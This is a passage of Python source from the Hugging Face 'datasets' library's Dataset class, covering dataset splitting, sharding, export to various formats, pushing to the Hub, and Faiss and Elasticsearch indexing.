self._get_cache_file_path(new_fingerprint) if os.path.exists(indices_cache_file_name) and load_from_cache_file: logger.warning(f"Loading cached shuffled indices for dataset at {indices_cache_file_name}") return self._new_dataset_with_indices( fingerprint=new_fingerprint, indices_cache_file_name=indices_cache_file_name ) permutation = generator.permutation(len(self)) return self.select( indices=permutation, keep_in_memory=keep_in_memory, indices_cache_file_name=indices_cache_file_name, writer_batch_size=writer_batch_size, new_fingerprint=new_fingerprint, ) @transmit_format @fingerprint_transform( inplace=False, randomized_function=True, fingerprint_names=["train_new_fingerprint", "test_new_fingerprint"], ignore_kwargs=["load_from_cache_file", "train_indices_cache_file_name", "test_indices_cache_file_name"], ) def train_test_split( self, test_size: Union[float, int, None] = None, train_size: Union[float, int, None] = None, shuffle: bool = True, seed: Optional[int] = None, generator: Optional[np.random.Generator] = None, keep_in_memory: bool = False, load_from_cache_file: bool = True, train_indices_cache_file_name: Optional[str] = None, test_indices_cache_file_name: Optional[str] = None, writer_batch_size: Optional[int] = 1000, train_new_fingerprint: Optional[str] = None, test_new_fingerprint: Optional[str] = None, ) -> "DatasetDict": """Return a dictionary (:obj:`datasets.DatsetDict`) with two random train and test subsets (`train` and `test` ``Dataset`` splits). Splits are created from the dataset according to `test_size`, `train_size` and `shuffle`. This method is similar to scikit-learn `train_test_split` with the omission of the stratified options. Args: test_size (:obj:`numpy.random.Generator`, optional): Size of the test split If float, should be between 0.0 and 1.0 and represent the proportion of the dataset to include in the test split. If int, represents the absolute number of test samples. If None, the value is set to the complement of the train size. If train_size is also None, it will be set to 0.25. train_size (:obj:`numpy.random.Generator`, optional): Size of the train split If float, should be between 0.0 and 1.0 and represent the proportion of the dataset to include in the train split. If int, represents the absolute number of train samples. If None, the value is automatically set to the complement of the test size. shuffle (:obj:`bool`, optional, default `True`): Whether or not to shuffle the data before splitting. seed (:obj:`int`, optional): A seed to initialize the default BitGenerator if ``generator=None``. If None, then fresh, unpredictable entropy will be pulled from the OS. If an int or array_like[ints] is passed, then it will be passed to SeedSequence to derive the initial BitGenerator state. generator (:obj:`numpy.random.Generator`, optional): Numpy random Generator to use to compute the permutation of the dataset rows. If ``generator=None`` (default), uses np.random.default_rng (the default BitGenerator (PCG64) of NumPy). keep_in_memory (:obj:`bool`, default `False`): Keep the splits indices in memory instead of writing it to a cache file. load_from_cache_file (:obj:`bool`, default `True`): If a cache file storing the splits indices can be identified, use it instead of recomputing. train_cache_file_name (:obj:`str`, optional): Provide the name of a path for the cache file. It is used to store the train split indices instead of the automatically generated cache file name. test_cache_file_name (:obj:`str`, optional): Provide the name of a path for the cache file. It is used to store the test split indices instead of the automatically generated cache file name. writer_batch_size (:obj:`int`, default `1000`): Number of rows per write operation for the cache file writer. This value is a good trade-off between memory usage during the processing, and processing speed. Higher value makes the processing do fewer lookups, lower value consume less temporary memory while running `.map()`. train_new_fingerprint (:obj:`str`, optional, defaults to `None`): the new fingerprint of the train set after transform. If `None`, the new fingerprint is computed using a hash of the previous fingerprint, and the transform arguments test_new_fingerprint (:obj:`str`, optional, defaults to `None`): the new fingerprint of the test set after transform. If `None`, the new fingerprint is computed using a hash of the previous fingerprint, and the transform arguments """ from .dataset_dict import DatasetDict # import here because of circular dependency if len(self.list_indexes()) > 0: raise DatasetTransformationNotAllowedError( "Using `.train_test_split` on a dataset with attached indexes is not allowed. You can first run `.drop_index() to remove your index and then re-add it." ) # If the array is empty we do nothing if len(self) == 0: return DatasetDict({"train": self, "test": self}) if test_size is None and train_size is None: test_size = 0.25 # Safety checks similar to scikit-learn's ones. # (adapted from https://github.com/scikit-learn/scikit-learn/blob/fd237278e895b42abe8d8d09105cbb82dc2cbba7/sklearn/model_selection/_split.py#L1750) n_samples = len(self) if ( isinstance(test_size, int) and (test_size >= n_samples or test_size <= 0) or isinstance(test_size, float) and (test_size <= 0 or test_size >= 1) ): raise ValueError( f"test_size={test_size} should be either positive and smaller " f"than the number of samples {n_samples} or a float in the (0, 1) range" ) if ( isinstance(train_size, int) and (train_size >= n_samples or train_size <= 0) or isinstance(train_size, float) and (train_size <= 0 or train_size >= 1) ): raise ValueError( f"train_size={train_size} should be either positive and smaller " f"than the number of samples {n_samples} or a float in the (0, 1) range" ) if train_size is not None and not isinstance(train_size, (int, float)): raise ValueError(f"Invalid value for train_size: {train_size} of type {type(train_size)}") if test_size is not None and not isinstance(test_size, (int, float)): raise ValueError(f"Invalid value for test_size: {test_size} of type {type(test_size)}") if isinstance(train_size, float) and isinstance(test_size, float) and train_size + test_size > 1: raise ValueError( f"The sum of test_size and train_size = {train_size + test_size}, should be in the (0, 1)" " range. Reduce test_size and/or train_size." ) if isinstance(test_size, float): n_test = ceil(test_size * n_samples) elif isinstance(test_size, int): n_test = float(test_size) if isinstance(train_size, float): n_train = floor(train_size * n_samples) elif isinstance(train_size, int): n_train = float(train_size) if train_size is None: n_train = n_samples - n_test elif test_size is None: n_test = n_samples - n_train if n_train + n_test > n_samples: raise ValueError( f"The sum of train_size and test_size = {n_train + n_test}, " "should be smaller than the number of " f"samples {n_samples}. Reduce test_size and/or " "train_size." ) n_train, n_test = int(n_train), int(n_test) if n_train == 0: raise ValueError( f"With n_samples={n_samples}, test_size={test_size} and train_size={train_size}, the " "resulting train set will be empty. Adjust any of the " "aforementioned parameters." ) if generator is None and shuffle is True: if seed is None: seed = np.random.get_state()[1][0] _ = np.random.random() # do 1 step of rng generator = np.random.default_rng(seed) # Check if we've already cached this computation (indexed by a hash) if self.cache_files: if train_indices_cache_file_name is None or test_indices_cache_file_name is None: # we create a unique hash from the function, current dataset file and the mapping args if train_indices_cache_file_name is None: train_indices_cache_file_name = self._get_cache_file_path(train_new_fingerprint) if test_indices_cache_file_name is None: test_indices_cache_file_name = self._get_cache_file_path(test_new_fingerprint) if ( os.path.exists(train_indices_cache_file_name) and os.path.exists(test_indices_cache_file_name) and load_from_cache_file ): logger.warning( f"Loading cached split indices for dataset at {train_indices_cache_file_name} and {test_indices_cache_file_name}" ) return DatasetDict( { "train": self._new_dataset_with_indices( fingerprint=train_new_fingerprint, indices_cache_file_name=train_indices_cache_file_name ), "test": self._new_dataset_with_indices( fingerprint=test_new_fingerprint, indices_cache_file_name=test_indices_cache_file_name ), } ) if not shuffle: train_indices = np.arange(n_train) test_indices = np.arange(n_train, n_train + n_test) else: # random partition permutation = generator.permutation(len(self)) test_indices = permutation[:n_test] train_indices = permutation[n_test : (n_test + n_train)] train_split = self.select( indices=train_indices, keep_in_memory=keep_in_memory, indices_cache_file_name=train_indices_cache_file_name, writer_batch_size=writer_batch_size, new_fingerprint=train_new_fingerprint, ) test_split = self.select( indices=test_indices, keep_in_memory=keep_in_memory, indices_cache_file_name=test_indices_cache_file_name, writer_batch_size=writer_batch_size, new_fingerprint=test_new_fingerprint, ) return DatasetDict({"train": train_split, "test": test_split}) def shard( self, num_shards: int, index: int, contiguous: bool = False, keep_in_memory: bool = False, indices_cache_file_name: Optional[str] = None, writer_batch_size: Optional[int] = 1000, ) -> "Dataset": """Return the `index`-nth shard from dataset split into `num_shards` pieces. This shards deterministically. dset.shard(n, i) will contain all elements of dset whose index mod n = i. dset.shard(n, i, contiguous=True) will instead split dset into contiguous chunks, so it can be easily concatenated back together after processing. If n % i == l, then the first l shards will have length (n // i) + 1, and the remaining shards will have length (n // i). `datasets.concatenate([dset.shard(n, i, contiguous=True) for i in range(n)])` will return a dataset with the same order as the original. Be sure to shard before using any randomizing operator (such as shuffle). It is best if the shard operator is used early in the dataset pipeline. Args: num_shards (:obj:`int`): How many shards to split the dataset into. index (:obj:`int`): Which shard to select and return. contiguous: (:obj:`bool`, default `False`): Whether to select contiguous blocks of indices for shards. keep_in_memory (:obj:`bool`, default `False`): Keep the dataset in memory instead of writing it to a cache file. load_from_cache_file (:obj:`bool`, default `True`): If a cache file storing the current computation from `function` can be identified, use it instead of recomputing. indices_cache_file_name (:obj:`str`, optional): Provide the name of a path for the cache file. It is used to store the indices of each shard instead of the automatically generated cache file name. writer_batch_size (:obj:`int`, default `1000`): Number of rows per write operation for the cache file writer. This value is a good trade-off between memory usage during the processing, and processing speed. Higher value makes the processing do fewer lookups, lower value consume less temporary memory while running `.map()`. """ if not 0 <= index < num_shards: raise ValueError("index should be in [0, num_shards-1]") if contiguous: div = len(self) // num_shards mod = len(self) % num_shards start = div * index + min(index, mod) end = start + div + (1 if index < mod else 0) indices = np.arange(start, end) else: indices = np.arange(index, len(self), num_shards) return self.select( indices=indices, keep_in_memory=keep_in_memory, indices_cache_file_name=indices_cache_file_name, writer_batch_size=writer_batch_size, ) def export( self, filename: str, format: str = "tfrecord", ): """Writes the Arrow dataset to a TFRecord file. The dataset must already be in tensorflow format. The records will be written with keys from `dataset._format_columns`. Args: filename (:obj:`str`): The filename, including the `.tfrecord` extension, to write to. format (`str`, optional, default `"tfrecord"`): The type of output file. Currently this is a no-op, as TFRecords are the only option. This enables a more flexible function signature later. """ try: import tensorflow as tf # noqa: F401 except ImportError: logger.error("Tensorflow needs to be installed to be able to return Tensorflow tensors.") # From https://www.tensorflow.org/tutorials/load_data/tfrecord def _bytes_feature(values): """Returns a bytes_list from a list of string / byte.""" return tf.train.Feature(bytes_list=tf.train.BytesList(value=values)) def _float_feature(values): """Returns a float_list from a list of float / double.""" return tf.train.Feature(float_list=tf.train.FloatList(value=values)) def _int64_feature(values): """Returns an int64_list from a list of bool / enum / int / uint.""" return tf.train.Feature(int64_list=tf.train.Int64List(value=values)) def _feature(values: Union[float, int, str, np.ndarray]) -> "tf.train.Feature": """Typechecks `values` and returns the corresponding tf.train.Feature.""" if isinstance(values, np.ndarray): if values.dtype == np.dtype(float): return _float_feature(values) elif values.dtype == np.int64: return _int64_feature(values) elif values.dtype == np.dtype(str) or ( values.dtype == np.dtype(object) and len(values) > 0 and isinstance(values[0], str) ): return _bytes_feature([v.encode() for v in values]) else: raise ValueError( f"values={values} is an np.ndarray with items of dtype {values[0].dtype}, which cannot be serialized" ) if hasattr(values, "dtype"): if np.issubdtype(values.dtype, np.floating): return _float_feature([values.item()]) elif np.issubdtype(values.dtype, np.integer): return _int64_feature([values.item()]) elif np.issubdtype(values.dtype, np.str): return _bytes_feature([values.item().encode()]) else: raise ValueError(f"values={values} has dtype {values.dtype}, which cannot be serialized") else: raise ValueError(f"values={values} are not numpy objects, and so cannot be serialized") def serialize_example(ex): feature = {key: _feature(value) for key, value in ex.items()} example_proto = tf.train.Example(features=tf.train.Features(feature=feature)) return example_proto.SerializeToString() def tf_serialize_example(ex): tf_string = tf.py_function(serialize_example, (ex,), tf.string) return tf.reshape(tf_string, ()) def generator(): for ex in self: yield serialize_example(ex) if self._format_type != "numpy": raise ValueError("Dataset format must be numpy before exporting") if not filename.endswith(".tfrecord"): raise ValueError("filename {filename} must end with .tfrecord") tf_dataset = tf.data.Dataset.from_generator(generator, output_types=tf.string, output_shapes=()) writer = tf.data.experimental.TFRecordWriter(filename) logger.info(f"Writing TFRecord to {filename}") writer.write(tf_dataset) logger.info(f"Finished writing TFRecord to {filename}") self = None # delete the dataset reference used by tf_dataset def to_csv( self, path_or_buf: Union[PathLike, BinaryIO], batch_size: Optional[int] = None, num_proc: Optional[int] = None, **to_csv_kwargs, ) -> int: """Exports the dataset to csv Args: path_or_buf (``PathLike`` or ``FileOrBuffer``): Either a path to a file or a BinaryIO. batch_size (Optional ``int``): Size of the batch to load in memory and write at once. Defaults to :obj:`datasets.config.DEFAULT_MAX_BATCH_SIZE`. num_proc (:obj:`int`, optional): Number of processes for multiprocessing. By default it doesn't use multiprocessing. ``batch_size`` in this case defaults to :obj:`datasets.config.DEFAULT_MAX_BATCH_SIZE` but feel free to make it 5x or 10x of the default value if you have sufficient compute power. to_csv_kwargs: Parameters to pass to pandas's :func:`pandas.DataFrame.to_csv` Returns: int: The number of characters or bytes written """ # Dynamic import to avoid circular dependency from .io.csv import CsvDatasetWriter return CsvDatasetWriter(self, path_or_buf, batch_size=batch_size, num_proc=num_proc, **to_csv_kwargs).write() def to_dict(self, batch_size: Optional[int] = None, batched: bool = False) -> Union[dict, Iterator[dict]]: """Returns the dataset as a Python dict. Can also return a generator for large datasets. Args: batched (``bool``): Set to :obj:`True` to return a generator that yields the dataset as batches of ``batch_size`` rows. Defaults to :obj:`False` (returns the whole datasetas once) batch_size (Optional ``int``): The size (number of rows) of the batches if ``batched`` is `True`. Defaults to :obj:`datasets.config.DEFAULT_MAX_BATCH_SIZE`. Returns: `dict` or `Iterator[dict]` """ if not batched: return query_table( table=self._data, key=slice(0, len(self)), indices=self._indices if self._indices is not None else None, ).to_pydict() else: batch_size = batch_size if batch_size else config.DEFAULT_MAX_BATCH_SIZE return ( query_table( table=self._data, key=slice(offset, offset + batch_size), indices=self._indices if self._indices is not None else None, ).to_pydict() for offset in range(0, len(self), batch_size) ) def to_json( self, path_or_buf: Union[PathLike, BinaryIO], batch_size: Optional[int] = None, num_proc: Optional[int] = None, **to_json_kwargs, ) -> int: """Export the dataset to JSON Lines or JSON. Args: path_or_buf (``PathLike`` or ``FileOrBuffer``): Either a path to a file or a BinaryIO. batch_size (:obj:`int`, optional): Size of the batch to load in memory and write at once. Defaults to :obj:`datasets.config.DEFAULT_MAX_BATCH_SIZE`. num_proc (:obj:`int`, optional): Number of processes for multiprocessing. By default it doesn't use multiprocessing. ``batch_size`` in this case defaults to :obj:`datasets.config.DEFAULT_MAX_BATCH_SIZE` but feel free to make it 5x or 10x of the default value if you have sufficient compute power. lines (:obj:`bool`, default ``True``): Whether output JSON lines format. Only possible if ``orient="records"`. It will throw ValueError with ``orient`` different from ``"records"``, since the others are not list-like. orient (:obj:`str`, default ``"records"``): Format of the JSON: - ``"records"``: list like ``[{column -> value}, … , {column -> value}]`` - ``"split"``: dict like ``{"index" -> [index], "columns" -> [columns], "data" -> [values]}`` - ``"index"``: dict like ``{index -> {column -> value}}`` - ``"columns"``: dict like ``{column -> {index -> value}}`` - ``"values"``: just the values array - ``"table"``: dict like ``{"schema": {schema}, "data": {data}}`` **to_json_kwargs: Parameters to pass to pandas's `pandas.DataFrame.to_json <https://pandas.pydata.org/docs/reference/api/pandas.DataFrame.to_json.html>`_. Returns: int: The number of characters or bytes written. """ # Dynamic import to avoid circular dependency from .io.json import JsonDatasetWriter return JsonDatasetWriter(self, path_or_buf, batch_size=batch_size, num_proc=num_proc, **to_json_kwargs).write() def to_pandas( self, batch_size: Optional[int] = None, batched: bool = False ) -> Union[pd.DataFrame, Iterator[pd.DataFrame]]: """Returns the dataset as a :class:`pandas.DataFrame`. Can also return a generator for large datasets. Args: batched (``bool``): Set to :obj:`True` to return a generator that yields the dataset as batches of ``batch_size`` rows. Defaults to :obj:`False` (returns the whole datasetas once) batch_size (Optional ``int``): The size (number of rows) of the batches if ``batched`` is `True`. Defaults to :obj:`datasets.config.DEFAULT_MAX_BATCH_SIZE`. Returns: `pandas.DataFrame` or `Iterator[pandas.DataFrame]` """ if not batched: return query_table( table=self._data, key=slice(0, len(self)), indices=self._indices if self._indices is not None else None, ).to_pandas(types_mapper=pandas_types_mapper) else: batch_size = batch_size if batch_size else config.DEFAULT_MAX_BATCH_SIZE return ( query_table( table=self._data, key=slice(offset, offset + batch_size), indices=self._indices if self._indices is not None else None, ).to_pandas(types_mapper=pandas_types_mapper) for offset in range(0, len(self), batch_size) ) def to_parquet( self, path_or_buf: Union[PathLike, BinaryIO], batch_size: Optional[int] = None, **parquet_writer_kwargs, ) -> int: """Exports the dataset to parquet Args: path_or_buf (``PathLike`` or ``FileOrBuffer``): Either a path to a file or a BinaryIO. batch_size (Optional ``int``): Size of the batch to load in memory and write at once. Defaults to :obj:`datasets.config.DEFAULT_MAX_BATCH_SIZE`. parquet_writer_kwargs: Parameters to pass to PyArrow's :class:`pyarrow.parquet.ParquetWriter` Returns: int: The number of characters or bytes written """ # Dynamic import to avoid circular dependency from .io.parquet import ParquetDatasetWriter return ParquetDatasetWriter(self, path_or_buf, batch_size=batch_size, **parquet_writer_kwargs).write() def _push_parquet_shards_to_hub( self, repo_id: str, split: Optional[str] = None, private: Optional[bool] = False, token: Optional[str] = None, branch: Optional[str] = None, shard_size: Optional[int] = 500 << 20, ) -> Tuple[str, str, int, int]: """Pushes the dataset to the hub. The dataset is pushed using HTTP requests and does not need to have neither git or git-lfs installed. Args: repo_id (:obj:`str`): The ID of the repository to push to in the following format: `<user>/<dataset_name>` or `<org>/<dataset_name>`. Also accepts `<dataset_name>`, which will default to the namespace of the logged-in user. split (Optional, :obj:`str`): The name of the split that will be given to that dataset. Defaults to `self.split`. private (Optional :obj:`bool`, defaults to :obj:`False`): Whether the dataset repository should be set to private or not. Only affects repository creation: a repository that already exists will not be affected by that parameter. token (Optional :obj:`str`): An optional authentication token for the Hugging Face Hub. If no token is passed, will default to the token saved locally when logging in with ``huggingface-cli login``. Will raise an error if no token is passed and the user is not logged-in. branch (Optional :obj:`str`): The git branch on which to push the dataset. This defaults to the default branch as specified in your repository, which defaults to `"main"`. shard_size (Optional :obj:`int`): The size of the dataset shards to be uploaded to the hub. The dataset will be pushed in files of the size specified here, in bytes. Defaults to a shard size of 500MB. Returns: repo_id (:obj:`str`): ID of the repository in <user>/<dataset_name>` or `<org>/<dataset_name>` format split (:obj:`str`): name of the uploaded split uploaded_size (:obj:`int`): number of uploaded bytes dataset_nbytes (:obj:`int`): approximate size in bytes of the uploaded dataset afer uncompression Example: .. code-block:: python >>> dataset.push_to_hub("<organization>/<dataset_id>", split="evaluation") """ api = HfApi(endpoint=config.HF_ENDPOINT) token = token if token is not None else HfFolder.get_token() if token is None: raise EnvironmentError( "You need to provide a `token` or be logged in to Hugging Face with " "`huggingface-cli login`." ) if split is None: split = self.split or "train" identifier = repo_id.split("/") if len(identifier) > 2: raise ValueError( f"The identifier should be in the format <repo_id> or <namespace>/<repo_id>. It is {identifier}, " "which doesn't conform to either format." ) if len(identifier) == 2: organization, dataset_name = identifier else: dataset_name = identifier[0] organization = api.whoami(token)["name"] repo_id = f"{organization}/{dataset_name}" try: api.create_repo( dataset_name, token, repo_type="dataset", organization=organization, private=private, ) except HTTPError as err: if err.response.status_code == 409: if private is not None: logger.warning("The repository already exists: the `private` keyword argument will be ignored.") else: raise if self._indices is not None: dataset_nbytes = self.data.nbytes * len(self._indices) / len(self.data) else: dataset_nbytes = self.data.nbytes num_shards = int(dataset_nbytes / shard_size) + 1 shards = (self.shard(num_shards=num_shards, index=i, contiguous=True) for i in range(num_shards)) files = api.list_repo_files(repo_id, repo_type="dataset", revision=branch, token=token) files = [file for file in files if file.startswith("data/")] def path_in_repo(_index): return f"data/{split}-{_index:05d}-of-{num_shards:05d}.parquet" # Only delete file shards that don't currently exist. Others will be overwritten if the content is different # or will be left intact is the content is identical. def should_delete_file(file_name): file_to_overwrite = file_name in [path_in_repo(i) for i in range(num_shards)] file_from_same_split = file_name.startswith(f"data/{split}-") return file_from_same_split and not file_to_overwrite file_shards_to_delete = [file for file in files if should_delete_file(file)] def delete_file(file): api.delete_file(file, repo_id=repo_id, token=token, repo_type="dataset", revision=branch) if len(file_shards_to_delete): for file in utils.tqdm( file_shards_to_delete, desc="Deleting unused files from dataset repository", total=len(file_shards_to_delete), disable=bool(logging.get_verbosity() == logging.NOTSET) or not utils.is_progress_bar_enabled(), ): delete_file(file) uploaded_size = 0 for index, shard in utils.tqdm( enumerate(shards), desc="Pushing dataset shards to the dataset hub", total=num_shards, disable=bool(logging.get_verbosity() == logging.NOTSET), ): buffer = BytesIO() shard.to_parquet(buffer) uploaded_size += buffer.tell() api.upload_file( path_or_fileobj=buffer.getvalue(), path_in_repo=path_in_repo(index), repo_id=repo_id, token=token, repo_type="dataset", revision=branch, identical_ok=True, ) return repo_id, split, uploaded_size, dataset_nbytes def push_to_hub( self, repo_id: str, split: Optional[str] = None, private: Optional[bool] = False, token: Optional[str] = None, branch: Optional[str] = None, shard_size: Optional[int] = 500 << 20, ): """Pushes the dataset to the hub. The dataset is pushed using HTTP requests and does not need to have neither git or git-lfs installed. Args: repo_id (:obj:`str`): The ID of the repository to push to in the following format: `<user>/<dataset_name>` or `<org>/<dataset_name>`. Also accepts `<dataset_name>`, which will default to the namespace of the logged-in user. split (Optional, :obj:`str`): The name of the split that will be given to that dataset. Defaults to `self.split`. private (Optional :obj:`bool`, defaults to :obj:`False`): Whether the dataset repository should be set to private or not. Only affects repository creation: a repository that already exists will not be affected by that parameter. token (Optional :obj:`str`): An optional authentication token for the Hugging Face Hub. If no token is passed, will default to the token saved locally when logging in with ``huggingface-cli login``. Will raise an error if no token is passed and the user is not logged-in. branch (Optional :obj:`str`): The git branch on which to push the dataset. This defaults to the default branch as specified in your repository, which defaults to `"main"`. shard_size (Optional :obj:`int`): The size of the dataset shards to be uploaded to the hub. The dataset will be pushed in files of the size specified here, in bytes. Defaults to a shard size of 500MB. Example: .. code-block:: python >>> dataset.push_to_hub("<organization>/<dataset_id>", split="evaluation") """ repo_id, split, uploaded_size, dataset_nbytes = self._push_parquet_shards_to_hub( repo_id=repo_id, split=split, private=private, token=token, branch=branch, shard_size=shard_size ) organization, dataset_name = repo_id.split("/") info_to_dump = self.info.copy() info_to_dump.download_checksums = None info_to_dump.download_size = uploaded_size info_to_dump.dataset_size = dataset_nbytes info_to_dump.size_in_bytes = uploaded_size + dataset_nbytes info_to_dump.splits = { split: SplitInfo(split, num_bytes=dataset_nbytes, num_examples=len(self), dataset_name=dataset_name) } buffer = BytesIO() buffer.write(f'{{"{organization}--{dataset_name}": '.encode()) info_to_dump._dump_info(buffer) buffer.write(b"}") HfApi(endpoint=config.HF_ENDPOINT).upload_file( path_or_fileobj=buffer.getvalue(), path_in_repo=config.DATASETDICT_INFOS_FILENAME, repo_id=repo_id, token=token, repo_type="dataset", revision=branch, identical_ok=True, ) @transmit_format @fingerprint_transform(inplace=False) def add_column(self, name: str, column: Union[list, np.array], new_fingerprint: str): """Add column to Dataset. .. versionadded:: 1.7 Args: name (str): Column name. column (list or np.array): Column data to be added. Returns: :class:`Dataset` """ column_table = InMemoryTable.from_pydict({name: column}) _check_column_names(self._data.column_names + column_table.column_names) # Concatenate tables horizontally table = concat_tables([self._data, column_table], axis=1) # Update features info = self.info.copy() info.features.update(Features.from_arrow_schema(column_table.schema)) table = update_metadata_with_features(table, info.features) return Dataset(table, info=info, split=self.split, indices_table=self._indices, fingerprint=new_fingerprint) def add_faiss_index( self, column: str, index_name: Optional[str] = None, device: Optional[int] = None, string_factory: Optional[str] = None, metric_type: Optional[int] = None, custom_index: Optional["faiss.Index"] = None, # noqa: F821 train_size: Optional[int] = None, faiss_verbose: bool = False, dtype=np.float32, ): """Add a dense index using Faiss for fast retrieval. By default the index is done over the vectors of the specified column. You can specify :obj:`device` if you want to run it on GPU (:obj:`device` must be the GPU index). You can find more information about Faiss here: - For `string factory <https://github.com/facebookresearch/faiss/wiki/The-index-factory>`__ Args: column (:obj:`str`): The column of the vectors to add to the index. index_name (Optional :obj:`str`): The index_name/identifier of the index. This is the index_name that is used to call :func:`datasets.Dataset.get_nearest_examples` or :func:`datasets.Dataset.search`. By default it corresponds to `column`. device (Optional :obj:`int`): If not None, this is the index of the GPU to use. By default it uses the CPU. string_factory (Optional :obj:`str`): This is passed to the index factory of Faiss to create the index. Default index class is ``IndexFlat``. metric_type (Optional :obj:`int`): Type of metric. Ex: faiss.faiss.METRIC_INNER_PRODUCT or faiss.METRIC_L2. custom_index (Optional :obj:`faiss.Index`): Custom Faiss index that you already have instantiated and configured for your needs. train_size (Optional :obj:`int`): If the index needs a training step, specifies how many vectors will be used to train the index. faiss_verbose (:obj:`bool`, defaults to False): Enable the verbosity of the Faiss index. dtype (data-type): The dtype of the numpy arrays that are indexed. Default is ``np.float32``. Example: .. code-block:: python ds = datasets.load_dataset('crime_and_punish', split='train') ds_with_embeddings = ds.map(lambda example: {'embeddings': embed(example['line']})) ds_with_embeddings.add_faiss_index(column='embeddings') # query scores, retrieved_examples = ds_with_embeddings.get_nearest_examples('embeddings', embed('my new query'), k=10) # save index ds_with_embeddings.save_faiss_index('embeddings', 'my_index.faiss') ds = datasets.load_dataset('crime_and_punish', split='train') # load index ds.load_faiss_index('embeddings', 'my_index.faiss') # query scores, retrieved_examples = ds.get_nearest_examples('embeddings', embed('my new query'), k=10) """ with self.formatted_as(type="numpy", columns=[column], dtype=dtype): super().add_faiss_index( column=column, index_name=index_name, device=device, string_factory=string_factory, metric_type=metric_type, custom_index=custom_index, train_size=train_size, faiss_verbose=faiss_verbose, ) return self def add_faiss_index_from_external_arrays( self, external_arrays: np.array, index_name: str, device: Optional[int] = None, string_factory: Optional[str] = None, metric_type: Optional[int] = None, custom_index: Optional["faiss.Index"] = None, # noqa: F821 train_size: Optional[int] = None, faiss_verbose: bool = False, dtype=np.float32, ): """Add a dense index using Faiss for fast retrieval. The index is created using the vectors of `external_arrays`. You can specify `device` if you want to run it on GPU (`device` must be the GPU index). You can find more information about Faiss here: - For `string factory <https://github.com/facebookresearch/faiss/wiki/The-index-factory>`__ Args: external_arrays (:obj:`np.array`): If you want to use arrays from outside the lib for the index, you can set :obj:`external_arrays`. It will use :obj:`external_arrays` to create the Faiss index instead of the arrays in the given :obj:`column`. index_name (:obj:`str`): The index_name/identifier of the index. This is the index_name that is used to call :func:`datasets.Dataset.get_nearest_examples` or :func:`datasets.Dataset.search`. device (Optional :obj:`int`): If not None, this is the index of the GPU to use. By default it uses the CPU. string_factory (Optional :obj:`str`): This is passed to the index factory of Faiss to create the index. Default index class is ``IndexFlat``. metric_type (Optional :obj:`int`): Type of metric. Ex: faiss.faiss.METRIC_INNER_PRODUCT or faiss.METRIC_L2. custom_index (Optional :obj:`faiss.Index`): Custom Faiss index that you already have instantiated and configured for your needs. train_size (Optional :obj:`int`): If the index needs a training step, specifies how many vectors will be used to train the index. faiss_verbose (:obj:`bool`, defaults to False): Enable the verbosity of the Faiss index. dtype (:obj:`numpy.dtype`): The dtype of the numpy arrays that are indexed. Default is np.float32. """ super().add_faiss_index_from_external_arrays( external_arrays=external_arrays.astype(dtype), index_name=index_name, device=device, string_factory=string_factory, metric_type=metric_type, custom_index=custom_index, train_size=train_size, faiss_verbose=faiss_verbose, ) def add_elasticsearch_index( self, column: str, index_name: Optional[str] = None, host: Optional[str] = None, port: Optional[int] = None, es_client: Optional["elasticsearch.Elasticsearch"] = None, # noqa: F821 es_index_name: Optional[str] = None, es_index_config: Optional[dict] = None, ): """Add a text index using ElasticSearch for fast retrieval. This is done in-place. Args: column (:obj:`str`): The column of the documents to add to the index. index_name (Optional :obj:`str`): The index_name/identifier of the index. This is the index name that is used to call :meth:`Dataset.get_nearest_examples` or :meth:`Dataset.search`. By default it corresponds to :obj:`column`. host (Optional :obj:`str`, defaults to localhost): host of where ElasticSearch is running port (Optional :obj:`str`, defaults to 9200): port of where ElasticSearch is running es_client (Optional :obj:`elasticsearch.Elasticsearch`): The elasticsearch client used to create the index if host and port are None. es_index_name (Optional :obj:`str`): The elasticsearch index name used to create the index. es_index_config (Optional :obj:`dict`): The configuration of the elasticsearch index. Default config is:: { "settings": { "number_of_shards": 1, "analysis": {"analyzer": {"stop_standard": {"type": "standard", " stopwords": "_english_"}}}, }, "mappings": { "properties": { "text": { "type": "text", "analyzer": "standard", "similarity": "BM25" }, } }, } Example: .. code-block:: python es_client = elasticsearch.Elasticsearch() ds = datasets.load_dataset('crime_and_punish', split='train') ds.add_elasticsearch_index(column='line', es_client=es_client, es_index_name="my_es_index") scores, retrieved_examples = ds.get_nearest_examples('line', 'my new query', k=10) """ with self.formatted_as(type=None, columns=[column]): super().add_elasticsearch_index( column=column, index_name=index_name, host=host, port=port, es_client=es_client, es_index_name=es_index_name, es_index_config=es_index_config, ) return self @transmit_format @fingerprint_transform(inplace=False) def add_item(self, item: dict, new_fingerprint: str): """Add item to Dataset. .. versionadded:: 1.7 Args: item (dict): Item data to be added. Returns: :class:`Dataset` """ item_table = InMemoryTable.from_pydict({k: [v] for k, v in item.items()}) # We don't call _check_if_features_can_be_aligned here so this cast is "unsafe" dset_features, item_features = _align_features([self.features, Features.from_arrow_schema(item_table.schema)]) # Cast to align the schemas of the tables and concatenate the tables table = concat_tables( [ self._data.cast(pa.schema(dset_features.type)) if self.features != dset_features else self._data, item_table.cast(pa.schema(item_features.type)), ] ) if self._indices is None: indices_table = None else: item_indices_array = pa.array([len(self._data)], type=pa.uint64()) item_indices_table = InMemoryTable.from_arrays([item_indices_array], names=["indices"]) indices_table = concat_tables([self._indices, item_indices_table]) info = self.info.copy() info.features.update(item_features) table = update_metadata_with_features(table, info.features) return Dataset( table, info=info, split=self.split, indices_table=indices_table, fingerprint=new_fingerprint, ) def align_labels_with_mapping(self, label2id: Dict, label_column: str) -> "Dataset": """Align the dataset's label ID and label name mapping to match an input :obj:`label2id` mapping. This is useful when you want to ensure that a model's predicted labels are aligned with the dataset. The alignment in done using the lowercase label names. Args: label2id (:obj:`dict`): The label name to ID mapping to align the dataset with. label_column (:obj:`str`): The column name of labels to align on. Example: .. code-block:: python # dataset with mapping {'entailment': 0, 'neutral': 1, 'contradiction': 2} ds = load_dataset("glue", "mnli", split="train") # mapping to align with label2id = {'CONTRADICTION': 0, 'NEUTRAL': 1, 'ENTAILMENT': 2} ds_aligned = ds.align_labels_with_mapping(label2id, "label") """ # Sanity checks if label_column not in self._data.column_names: raise ValueError(f"Column ({label_column}) not in table columns ({self._data.column_names}).") label_feature = self.features[label_column] if not isinstance(label_feature, ClassLabel): raise ValueError( f"Aligning labels with a mapping is only supported for {ClassLabel.__name__} column, and column {label_feature} is {type(label_feature).__name__}." ) # Sort input mapping by ID value to ensure the label names are aligned label2id = dict(sorted(label2id.items(), key=lambda item: item[1])) label_names = list(label2id.keys()) # Some label mappings use uppercase label names so we lowercase them 